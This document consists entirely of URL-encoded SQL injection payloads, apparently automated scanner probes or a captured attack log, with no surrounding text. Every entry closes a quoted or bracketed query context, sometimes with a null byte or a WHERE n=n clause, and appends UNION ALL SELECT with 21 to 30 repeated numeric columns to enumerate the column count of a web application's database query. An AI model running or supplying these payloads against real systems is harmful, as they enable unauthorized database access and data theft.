-9565%25%27%29%29%20UNION%20ALL%20SELECT%204173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%23 -5523%25%27%29%29%20UNION%20ALL%20SELECT%203741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%2C3741%23 -6444%25%27%29%29%20UNION%20ALL%20SELECT%202455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%23 -8678%25%27%29%29%20UNION%20ALL%20SELECT%205614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%2C5614%23 -4831%25%27%29%29%20UNION%20ALL%20SELECT%206298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%2C6298%23 -7243%25%27%29%29%20UNION%20ALL%20SELECT%206340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%2C6340%23 -6139%25%27%29%29%20UNION%20ALL%20SELECT%205234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%2C5234%23 -4372%25%27%29%29%20UNION%20ALL%20SELECT%207809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%2C7809%23 -2880%25%27%29%29%20UNION%20ALL%20SELECT%203755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%2C3755%23 -1105%25%27%29%29%29%20UNION%20ALL%20SELECT%202739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739%23 -6170%25%27%29%29%29%20UNION%20ALL%20SELECT%205477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%23 -2569%25%27%29%29%29%20UNION%20ALL%20SELECT%209873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%2C9873%23 -3875%25%27%29%29%29%20UNION%20ALL%20SELECT%207172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%2C7172%23 -1317%25%27%29%29%29%20UNION%20ALL%20SELECT%208303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%23 -5320%25%27%29%29%29%20UNION%20ALL%20SELECT%201558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%2C1558%23 -1944%25%27%29%29%29%20UNION%20ALL%20SELECT%205020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%23 -2831%25%27%29%29%29%20UNION%20ALL%20SELECT%202056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%2C2056%23 -9926%25%27%29%29%29%20UNION%20ALL%20SELECT%202079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%2C2079%23 -7448%25%27%29%29%29%20UNION%20ALL%20SELECT%205255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%23 -6372%25%27%20UNION%20ALL%20SELECT%205449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%23 -1930%25%27%20UNION%20ALL%20SELECT%205306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%2C5306%23 -1513%25%27%20UNION%20ALL%20SELECT%208653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%23 -2410%25%27%20UNION%20ALL%20SELECT%203540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%2C3540%23 -7743%25%27%20UNION%20ALL%20SELECT%202245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%23 -3504%25%27%20UNION%20ALL%20SELECT%207663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%2C7663%23 -6120%25%27%20UNION%20ALL%20SELECT%207235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%2C7235%23 -7686%25%27%20UNION%20ALL%20SELECT%207191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%2C7191%23 -1352%25%27%20UNION%20ALL%20SELECT%201256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%2C1256%23 -1814%25%27%20UNION%20ALL%20SELECT%207790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%2C7790%23 -6540%00%27%29%20UNION%20ALL%20SELECT%207118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%23 -7456%00%27%29%20UNION%20ALL%20SELECT%205820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%2C5820%23 -3532%00%27%29%20UNION%20ALL%20SELECT%204358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%2C4358%23 -9983%00%27%29%20UNION%20ALL%20SELECT%209646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%2C9646%23 -2133%00%27%29%20UNION%20ALL%20SELECT%203346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%2C3346%23 -7631%00%27%29%20UNION%20ALL%20SELECT%203621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%23 -6075%00%27%29%20UNION%20ALL%20SELECT%203500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%2C3500%23 -1279%00%27%29%20UNION%20ALL%20SELECT%206681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%2C6681%23 -4307%00%27%29%20UNION%20ALL%20SELECT%201172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%2C1172%23 -5619%00%27%29%20UNION%20ALL%20SELECT%207563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%2C7563%23 -2029%00%27%20UNION%20ALL%20SELECT%204540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%2C4540%23 -5047%00%27%20UNION%20ALL%20SELECT%201454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%23 -4690%00%27%20UNION%20ALL%20SELECT%205082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%2C5082%23 -3429%00%27%20UNION%20ALL%20SELECT%203407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%2C3407%23 -9906%00%27%20UNION%20ALL%20SELECT%201236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%2C1236%23 -5789%00%27%20UNION%20ALL%20SELECT%206770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%2C6770%23 -2137%00%27%20UNION%20ALL%20SELECT%201450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%2C1450%23 -3465%00%27%20UNION%20ALL%20SELECT%201574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%2C1574%23 -3969%00%27%20UNION%20ALL%20SELECT%206220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%2C6220%23 -4474%00%27%20UNION%20ALL%20SELECT%206410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%2C6410%23 -5618%27%29%20WHERE%201487%3D1487%20UNION%20ALL%20SELECT%201487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%2C1487%23 -9479%27%29%20WHERE%205367%3D5367%20UNION%20ALL%20SELECT%205367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%2C5367%23 -3071%27%29%20WHERE%209327%3D9327%20UNION%20ALL%20SELECT%209327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%23 -9628%27%29%20WHERE%205575%3D5575%20UNION%20ALL%20SELECT%205575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%23 -6119%27%29%20WHERE%204751%3D4751%20UNION%20ALL%20SELECT%204751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%2C4751%23 -5383%27%29%20WHERE%205965%3D5965%20UNION%20ALL%20SELECT%205965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%23 -3469%27%29%20WHERE%201974%3D1974%20UNION%20ALL%20SELECT%201974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%2C1974%23 -5106%27%29%20WHERE%208780%3D8780%20UNION%20ALL%20SELECT%208780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%2C8780%23 -3253%27%29%20WHERE%205763%3D5763%20UNION%20ALL%20SELECT%205763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%2C5763%23 -6161%27%29%20WHERE%203088%3D3088%20UNION%20ALL%20SELECT%203088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%2C3088%23 -1276%22%29%20WHERE%201526%3D1526%20UNION%20ALL%20SELECT%201526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%2C1526%23 -3421%22%29%20WHERE%204525%3D4525%20UNION%20ALL%20SELECT%204525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%2C4525%23 -6770%22%29%20WHERE%205423%3D5423%20UNION%20ALL%20SELECT%205423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%2C5423%23 -5532%22%29%20WHERE%208151%3D8151%20UNION%20ALL%20SELECT%208151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%2C8151%23 -4464%22%29%20WHERE%208826%3D8826%20UNION%20ALL%20SELECT%208826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%2C8826%23 -3161%22%29%20WHERE%203246%3D3246%20UNION%20ALL%20SELECT%203246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%2C3246%23 -2680%22%29%20WHERE%203383%3D3383%20UNION%20ALL%20SELECT%203383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%23 -2864%22%29%20WHERE%202707%3D2707%20UNION%20ALL%20SELECT%202707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%2C2707%23 -3830%22%29%20WHERE%204973%3D4973%20UNION%20ALL%20SELECT%204973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%2C4973%23 -1139%22%29%20WHERE%207218%3D7218%20UNION%20ALL%20SELECT%207218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%2C7218%23 -3181%29%20WHERE%208419%3D8419%20UNION%20ALL%20SELECT%208419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%2C8419%23 -6203%29%20WHERE%202277%3D2277%20UNION%20ALL%20SELECT%202277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%2C2277%23 -3340%29%20WHERE%207773%3D7773%20UNION%20ALL%20SELECT%207773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%2C7773%23 -2517%29%20WHERE%208501%3D8501%20UNION%20ALL%20SELECT%208501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%2C8501%23 -5375%29%20WHERE%204115%3D4115%20UNION%20ALL%20SELECT%204115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%23 -8031%29%20WHERE%206664%3D6664%20UNION%20ALL%20SELECT%206664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%2C6664%23 -4871%29%20WHERE%206570%3D6570%20UNION%20ALL%20SELECT%206570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%2C6570%23 -6979%29%20WHERE%206838%3D6838%20UNION%20ALL%20SELECT%206838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%2C6838%23 -8708%29%20WHERE%207207%3D7207%20UNION%20ALL%20SELECT%207207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%2C7207%23 -5135%29%20WHERE%201464%3D1464%20UNION%20ALL%20SELECT%201464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%23 -5670%27%20WHERE%203438%3D3438%20UNION%20ALL%20SELECT%203438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%23 -6200%27%20WHERE%204984%3D4984%20UNION%20ALL%20SELECT%204984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%23 -7552%27%20WHERE%204378%3D4378%20UNION%20ALL%20SELECT%204378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%2C4378%23 -7243%27%20WHERE%201103%3D1103%20UNION%20ALL%20SELECT%201103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%23 -2645%27%20WHERE%207197%3D7197%20UNION%20ALL%20SELECT%207197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%2C7197%23 -8123%27%20WHERE%204758%3D4758%20UNION%20ALL%20SELECT%204758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%23 -9358%27%20WHERE%208424%3D8424%20UNION%20ALL%20SELECT%208424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%2C8424%23 -9233%27%20WHERE%201988%3D1988%20UNION%20ALL%20SELECT%201988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%23 -8016%27%20WHERE%206030%3D6030%20UNION%20ALL%20SELECT%206030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%2C6030%23 -3817%27%20WHERE%207730%3D7730%20UNION%20ALL%20SELECT%207730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%23 -5129%22%20WHERE%209491%3D9491%20UNION%20ALL%20SELECT%209491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%2C9491%23 -9878%22%20WHERE%202659%3D2659%20UNION%20ALL%20SELECT%202659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%2C2659%23 -5307%22%20WHERE%205671%3D5671%20UNION%20ALL%20SELECT%205671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%2C5671%23 -4102%22%20WHERE%201961%3D1961%20UNION%20ALL%20SELECT%201961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%2C1961%23 -6646%22%20WHERE%205136%3D5136%20UNION%20ALL%20SELECT%205136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%2C5136%23 